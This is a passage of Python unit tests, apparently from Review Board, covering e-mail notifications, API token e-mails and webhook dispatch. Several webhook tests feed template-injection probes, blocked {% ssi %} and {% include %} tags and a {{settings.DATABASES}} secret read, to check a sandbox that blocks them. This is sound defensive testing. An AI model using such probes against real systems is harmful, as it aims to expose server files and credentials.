review_request.target_people = [site_user1, site_user2, site_user3,
non_site_user1]
review_request.target_groups = [group]
review = Review.objects.create(review_request=review_request,
user=site_user4)
review.publish()
review = Review.objects.create(review_request=review_request,
user=non_site_user2)
review.publish()
from_email = get_email_address_for_user(review_request.submitter)
# Now that we're set up, send another e-mail.
mail.outbox = []
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertValidRecipients(
['site_user1', 'site_user2', 'site_user3', 'site_user4',
'site_user5', review_request.submitter.username], [])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_review_request_email_with_unicode_summary(self):
"""Testing sending a review request e-mail with a unicode subject"""
self.spy_on(logging.exception)
with self.settings(EMAIL_BACKEND=_CONSOLE_EMAIL_BACKEND):
review_request = self.create_review_request()
review_request.summary = '\ud83d\ude04'
review_request.target_people.add(User.objects.get(
username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertIsNotNone(review_request.email_message_id)
self.assertFalse(logging.exception.spy.called)
def test_review_request_email_with_unicode_description(self):
"""Testing sending a review request e-mail with a unicode
description
"""
self.spy_on(logging.exception)
with self.settings(EMAIL_BACKEND=_CONSOLE_EMAIL_BACKEND):
review_request = self.create_review_request()
review_request.description = '\ud83d\ude04'
review_request.target_people.add(
User.objects.get(username='grumpy'))
review_request.target_people.add(
User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertIsNotNone(review_request.email_message_id)
self.assertFalse(logging.exception.spy.called)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_added_file(self):
"""Testing sending a review request e-mail with added files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='/dev/null',
source_revision=PRE_CREATION)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 1)
self.assertFalse(filediff.source_file in diff_headers)
self.assertTrue(filediff.dest_file in diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_deleted_file(self):
"""Testing sending a review request e-mail with deleted files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
dest_file='/dev/null',
status=FileDiff.DELETED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 1)
self.assertTrue(filediff.source_file in diff_headers)
self.assertFalse(filediff.dest_file in diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_moved_file(self):
"""Testing sending a review request e-mail with moved files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.MOVED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 2)
self.assertTrue(filediff.source_file in diff_headers)
self.assertTrue(filediff.dest_file in diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_copied_file(self):
"""Testing sending a review request e-mail with copied files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.COPIED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 2)
self.assertTrue(filediff.source_file in diff_headers)
self.assertTrue(filediff.dest_file in diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_multiple_files(self):
"""Testing sending a review request e-mail with multiple files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediffs = [
self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.MOVED),
self.create_filediff(diffset=diffset,
source_file='baz',
dest_file='/dev/null',
status=FileDiff.DELETED)
]
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertTrue('X-ReviewBoard-Diff-For' in message._headers)
diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
self.assertEqual(len(diff_headers), 3)
self.assertTrue(filediffs[0].source_file in diff_headers)
self.assertTrue(filediffs[0].dest_file in diff_headers)
self.assertTrue(filediffs[1].source_file in diff_headers)
self.assertFalse(filediffs[1].dest_file in diff_headers)
def test_extra_headers_dict(self):
"""Testing sending extra headers as a dict with an e-mail message"""
review_request = self.create_review_request()
submitter = review_request.submitter
send_review_mail(submitter,
review_request,
'Foo',
None,
[submitter],
[],
'notifications/review_request_email.txt',
'notifications/review_request_email.html',
extra_headers={
'X-Foo': 'Bar'
})
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-Foo', message._headers)
self.assertEqual(message._headers['X-Foo'], 'Bar')
def test_extra_headers_multivalue_dict(self):
"""Testing sending extra headers as a MultiValueDict with an e-mail
message
"""
header_values = ['Bar', 'Baz']
review_request = self.create_review_request()
submitter = review_request.submitter
send_review_mail(review_request.submitter,
review_request,
'Foo',
None,
[submitter],
[],
'notifications/review_request_email.txt',
'notifications/review_request_email.html',
extra_headers=MultiValueDict({
'X-Foo': header_values,
}))
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-Foo', message._headers)
self.assertEqual(set(message._headers.getlist('X-Foo')),
set(header_values))
def test_review_no_shipit_headers(self):
"""Testing sending a review e-mail without a 'Ship It!'"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertNotIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_only_headers(self):
"""Testing sending a review e-mail with only a 'Ship It!'"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_only_headers_no_text(self):
"""Testing sending a review e-mail with only a 'Ship It!' and no text
"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top='',
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_headers_custom_top_text(self):
"""Testing sending a review e-mail with a 'Ship It' and custom top text
"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top='Some general information.',
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_headers_bottom_text(self):
"""Testing sending a review e-mail with a 'Ship It' and bottom text"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='Some comments',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
@add_fixtures(['test_scmtools'])
def test_review_shipit_headers_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and diff comments
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository,
public=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_diff_comment(review, filediff)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
@add_fixtures(['test_scmtools'])
def test_review_shipit_headers_comments_opened_issue(self):
"""Testing sending a review e-mail with a 'Ship It' and diff comments
with opened issue
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository,
public=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_diff_comment(review, filediff, issue_opened=True)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertTrue(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_headers_attachment_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and file attachment
comments
"""
review_request = self.create_review_request(public=True)
file_attachment = self.create_file_attachment(review_request)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_file_attachment_comment(review, file_attachment)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_headers_attachment_comments_opened_issue(self):
"""Testing sending a review e-mail with a 'Ship It' and file attachment
comments with opened issue
"""
review_request = self.create_review_request(public=True)
file_attachment = self.create_file_attachment(review_request)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_file_attachment_comment(review, file_attachment,
issue_opened=True)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertTrue(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_headers_screenshot_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and screenshot
comments
"""
review_request = self.create_review_request(public=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_screenshot_comment(review, screenshot)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_headers_screenshot_comments_opened_issue(self):
"""Testing sending a review e-mail with a 'Ship It' and screenshot
comments with opened issue
"""
review_request = self.create_review_request(public=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_screenshot_comment(review, screenshot, issue_opened=True)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertTrue(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_headers_general_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and general
comments
"""
review_request = self.create_review_request(public=True)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_general_comment(review)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertFalse(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_review_shipit_headers_general_comments_opened_issue(self):
"""Testing sending a review e-mail with a 'Ship It' and general
comments with opened issue
"""
review_request = self.create_review_request(public=True)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_general_comment(review, issue_opened=True)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
self.assertTrue(Review.FIX_IT_THEN_SHIP_IT_TEXT in
message.message().as_string())
def test_change_ownership_email(self):
"""Testing sending a review request e-mail when the owner is being
changed
"""
admin_user = User.objects.get(username='admin')
admin_email = get_email_address_for_user(admin_user)
review_request = self.create_review_request(public=True)
submitter = review_request.submitter
submitter_email = get_email_address_for_user(submitter)
draft = ReviewRequestDraft.create(review_request)
draft.owner = admin_user
draft.save()
review_request.publish(submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertEqual(message.extra_headers['From'], submitter_email)
self.assertSetEqual(set(message.to),
{admin_email, submitter_email})
def test_change_ownership_email_not_submitter(self):
"""Testing sending a review request e-mail when the owner is being
changed by someone else
"""
admin_user = User.objects.get(username='admin')
admin_email = get_email_address_for_user(admin_user)
review_request = self.create_review_request(public=True)
submitter = review_request.submitter
submitter_email = get_email_address_for_user(submitter)
draft = ReviewRequestDraft.create(review_request)
draft.owner = admin_user
draft.save()
review_request.publish(admin_user)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertEqual(message.extra_headers['From'], admin_email)
self.assertSetEqual(set(message.to),
{admin_email, submitter_email})
def _get_sender(self, user):
return build_email_address(user.get_full_name(), self.sender)
class WebAPITokenEmailTests(EmailTestHelper, TestCase):
"""Unit tests for WebAPIToken creation e-mails."""
def setUp(self):
super(WebAPITokenEmailTests, self).setUp()
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set('mail_send_new_user_mail', False)
siteconfig.save()
load_site_config()
self.user = User.objects.create(username='test-user',
first_name='Sample',
last_name='User',
email='test-user@example.com')
self.assertEqual(len(mail.outbox), 0)
def test_create_token(self):
"""Testing sending e-mail when a new API Token is created"""
webapi_token = WebAPIToken.objects.generate_token(user=self.user,
note='Test',
policy={})
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
html_body = email.alternatives[0][0]
partial_token = '%s...' % webapi_token.token[:10]
self.assertEqual(email.subject, 'New Review Board API token created')
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
self.assertEqual(email.to[0],
build_email_address(self.user.get_full_name(),
self.user.email))
self.assertNotIn(webapi_token.token, email.body)
self.assertNotIn(webapi_token.token, html_body)
self.assertIn(partial_token, email.body)
self.assertIn(partial_token, html_body)
self.assertIn('A new API token has been added', email.body)
self.assertIn('A new API token has been added', html_body)
def test_update_token(self):
"""Testing sending e-mail when an existing API Token is updated"""
webapi_token = WebAPIToken.objects.generate_token(user=self.user,
note='Test',
policy={})
mail.outbox = []
webapi_token.save()
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
html_body = email.alternatives[0][0]
partial_token = '%s...' % webapi_token.token[:10]
self.assertEqual(email.subject, 'Review Board API token updated')
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
self.assertEqual(email.to[0],
build_email_address(self.user.get_full_name(),
self.user.email))
self.assertNotIn(webapi_token.token, email.body)
self.assertNotIn(webapi_token.token, html_body)
self.assertIn(partial_token, email.body)
self.assertIn(partial_token, html_body)
self.assertIn('One of your API tokens has been updated', email.body)
self.assertIn('One of your API tokens has been updated', html_body)
def test_delete_token(self):
"""Testing sending e-mail when an existing API Token is deleted"""
webapi_token = WebAPIToken.objects.generate_token(user=self.user,
note='Test',
policy={})
mail.outbox = []
webapi_token.delete()
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
html_body = email.alternatives[0][0]
self.assertEqual(email.subject, 'Review Board API token deleted')
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
self.assertEqual(email.to[0],
build_email_address(self.user.get_full_name(),
self.user.email))
self.assertIn(webapi_token.token, email.body)
self.assertIn(webapi_token.token, html_body)
self.assertIn('One of your API tokens has been deleted', email.body)
self.assertIn('One of your API tokens has been deleted', html_body)
class WebHookPayloadTests(SpyAgency, TestCase):
"""Tests for payload rendering."""
ENDPOINT_URL = 'http://example.com/endpoint/'
@add_fixtures(['test_scmtools', 'test_users'])
def test_diffset_rendered(self):
"""Testing JSON-serializability of DiffSets in WebHook payloads"""
self.spy_on(urlopen, call_original=False)
WebHookTarget.objects.create(url=self.ENDPOINT_URL,
events='review_request_published')
review_request = self.create_review_request(create_repository=True)
self.create_diffset(review_request)
review_request.publish(review_request.submitter)
self.assertTrue(urlopen.spy.called)
self.create_diffset(review_request, draft=True)
review_request.publish(review_request.submitter)
self.assertEqual(len(urlopen.spy.calls), 2)
class WebHookCustomContentTests(TestCase):
"""Unit tests for render_custom_content."""
def test_with_valid_template(self):
"""Tests render_custom_content with a valid template"""
s = render_custom_content(
'{% if mybool %}{{s1}}{% else %}{{s2}}{% endif %}',
{
'mybool': True,
's1': 'Hi!',
's2': 'Bye!',
})
self.assertEqual(s, 'Hi!')
def test_with_blocked_block_tag(self):
"""Tests render_custom_content with blocked {% block %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'block'"):
render_custom_content('{% block foo %}{% endblock %})')
def test_with_blocked_debug_tag(self):
"""Tests render_custom_content with blocked {% debug %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'debug'"):
render_custom_content('{% debug %}')
def test_with_blocked_extends_tag(self):
"""Tests render_custom_content with blocked {% extends %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'extends'"):
render_custom_content('{% extends "base.html" %}')
def test_with_blocked_include_tag(self):
"""Tests render_custom_content with blocked {% include %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'include'"):
render_custom_content('{% include "base.html" %}')
def test_with_blocked_load_tag(self):
"""Tests render_custom_content with blocked {% load %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'load'"):
render_custom_content('{% load i18n %}')
def test_with_blocked_ssi_tag(self):
"""Tests render_custom_content with blocked {% ssi %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'ssi'"):
render_custom_content('{% ssi "foo.html" %}')
def test_with_unknown_vars(self):
"""Tests render_custom_content with unknown variables"""
s = render_custom_content('{{settings.DEBUG}};{{settings.DATABASES}}')
self.assertEqual(s, ';')
class WebHookDispatchTests(SpyAgency, TestCase):
"""Unit tests for dispatching webhooks."""
ENDPOINT_URL = 'http://example.com/endpoint/'
def test_dispatch_custom_payload(self):
"""Test dispatch_webhook_event with custom payload"""
custom_content = (
'{\n'
'{% for i in items %}'
' "item{{i}}": true{% if not forloop.last %},{% endif %}\n'
'{% endfor %}'
'}')
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON,
use_custom_content=True,
custom_content=custom_content)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
('{\n'
' "item1": true,\n'
' "item2": true,\n'
' "item3": true\n'
'}'))
def test_dispatch_form_data(self):
"""Test dispatch_webhook_event with Form Data payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_FORM_DATA)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/x-www-form-urlencoded',
'payload=%7B%22items%22%3A+%5B1%2C+2%2C+3%5D%7D')
def test_dispatch_json(self):
"""Test dispatch_webhook_event with JSON payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
'{"items": [1, 2, 3]}')
def test_dispatch_xml(self):
"""Test dispatch_webhook_event with XML payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_XML)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/xml',
('<?xml version="1.0" encoding="utf-8"?>\n'
'<rsp>\n'
' <items>\n'
' <array>\n'
' <item>1</item>\n'
' <item>2</item>\n'
' <item>3</item>\n'
' </array>\n'
' </items>\n'
'</rsp>'))
def test_dispatch_with_secret(self):
"""Test dispatch_webhook_event with HMAC secret"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON,
secret='foobar123')
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
'{"items": [1, 2, 3]}',
'sha1=46f8529ef47da2291eeb475f0d0c0a6f58f88f8b')
def test_dispatch_invalid_template(self):
"""Testing dispatch_webhook_event with an invalid template"""
handler = WebHookTarget(events='my-event', url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON,
use_custom_content=True,
custom_content=r'{% invalid_block_tag %}')
self.spy_on(logging.exception)
self.spy_on(urlopen, call_fake=lambda *args, **kwargs: None)
dispatch_webhook_event(FakeHTTPRequest(None), [handler], 'my-event',
None)
self.assertFalse(urlopen.spy.called)
self.assertTrue(logging.exception.spy.called)
self.assertIsInstance(logging.exception.spy.last_call.args[1],
TemplateSyntaxError)
def test_dispatch_render_error(self):
"""Testing dispatch_webhook_event with an unencodable object"""
class Unencodable(object):
pass
handler = WebHookTarget(events='my-event', url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON)
self.spy_on(logging.exception)
self.spy_on(urlopen, call_fake=lambda *args, **kwargs: None)
dispatch_webhook_event(FakeHTTPRequest(None), [handler], 'my-event', {
'unencodable': Unencodable(),
})
self.assertFalse(urlopen.spy.called)
self.assertTrue(logging.exception.spy.called)
self.assertIsInstance(logging.exception.spy.last_call.args[1],
TypeError)
def test_dispatch_cannot_open(self):
"""Testing dispatch_webhook_event with an unresolvable URL"""
def _urlopen(*args, **kwargs):
raise IOError('')
handler = WebHookTarget(events='my-event', url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON)
self.spy_on(logging.exception)
self.spy_on(urlopen, call_fake=_urlopen)
dispatch_webhook_event(FakeHTTPRequest(None), [handler, handler],
'my-event',
None)
self.assertEqual(len(urlopen.spy.calls), 2)
self.assertTrue(len(logging.exception.spy.calls), 2)
self.assertIsInstance(logging.exception.spy.calls[0].args[2], IOError)
self.assertIsInstance(logging.exception.spy.calls[1].args[2], IOError)
def _test_dispatch(self, handler, event, payload, expected_content_type,
expected_data, expected_sig_header=None):
def _urlopen(request):
self.assertEqual(request.get_full_url(), self.ENDPOINT_URL)
self.assertEqual(request.headers['X-reviewboard-event'], event)
self.assertEqual(request.headers['Content-type'],
expected_content_type)
self.assertEqual(request.data, expected_data)
self.assertEqual(request.headers['Content-length'],
len(expected_data))
if expected_sig_header:
self.assertIn('X-hub-signature', request.headers)
self.assertEqual(request.headers['X-hub-signature'],
expected_sig_header)
else:
self.assertNotIn('X-hub-signature', request.headers)
self.spy_on(urlopen, call_fake=_urlopen)
request = FakeHTTPRequest(None)
dispatch_webhook_event(request, [handler], event, payload)
class WebHookTargetManagerTests(TestCase):
"""Unit tests for WebHookTargetManager."""
ENDPOINT_URL = 'http://example.com/endpoint/'
def test_for_event(self):
"""Testing WebHookTargetManager.for_event"""
# These should not match.
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event3',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_ALL)
# These should match.
target1 = WebHookTarget.objects.create(
events='event2,event3',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='*',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
targets = WebHookTarget.objects.for_event('event3')
self.assertEqual(targets, [target1, target2])
def test_for_event_with_local_site(self):
"""Testing WebHookTargetManager.for_event with Local Sites"""
site = LocalSite.objects.create(name='test-site')
# These should not match.
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
local_site=site,
apply_to=WebHookTarget.APPLY_TO_ALL)
# This should match.
target = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
local_site=site,
apply_to=WebHookTarget.APPLY_TO_ALL)
targets = WebHookTarget.objects.for_event('event1',
local_site_id=site.pk)
self.assertEqual(targets, [target])
@add_fixtures(['test_scmtools'])
def test_for_event_with_repository(self):
"""Testing WebHookTargetManager.for_event with repository"""
repository1 = self.create_repository()
repository2 = self.create_repository()
# These should not match.
unused_target1 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target1.repositories.add(repository2)
unused_target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target2.repositories.add(repository1)
WebHookTarget.objects.create(
events='event3',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
# These should match.
target1 = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
target2.repositories.add(repository1)
targets = WebHookTarget.objects.for_event('event1',
repository_id=repository1.pk)
self.assertEqual(targets, [target1, target2])
@add_fixtures(['test_scmtools'])
def test_for_event_with_no_repository(self):
"""Testing WebHookTargetManager.for_event with no repository"""
repository = self.create_repository()
# These should not match.
unused_target1 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target1.repositories.add(repository)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
WebHookTarget.objects.create(
events='event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
# These should match.
target1 = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
targets = WebHookTarget.objects.for_event('event1')
self.assertEqual(targets, [target1, target2])
def test_for_event_with_all_events(self):
"""Testing WebHookTargetManager.for_event with ALL_EVENTS"""
with self.assertRaisesMessage(ValueError,
'"*" is not a valid event choice'):
WebHookTarget.objects.for_event(WebHookTarget.ALL_EVENTS)
class WebHookSignalDispatchTests(SpyAgency, TestCase):
"""Unit tests for dispatching webhooks by signals."""
ENDPOINT_URL = 'http://example.com/endpoint/'
fixtures = ['test_users']
def setUp(self):
super(WebHookSignalDispatchTests, self).setUp()
self.spy_on(dispatch_webhook_event, call_original=False)
def test_review_request_closed_submitted(self):
"""Testing webhook dispatch from 'review_request_closed' signal
with submitted
"""
target = WebHookTarget.objects.create(events='review_request_closed',
url=self.ENDPOINT_URL)
review_request = self.create_review_request(publish=True)
review_request.close(review_request.SUBMITTED)
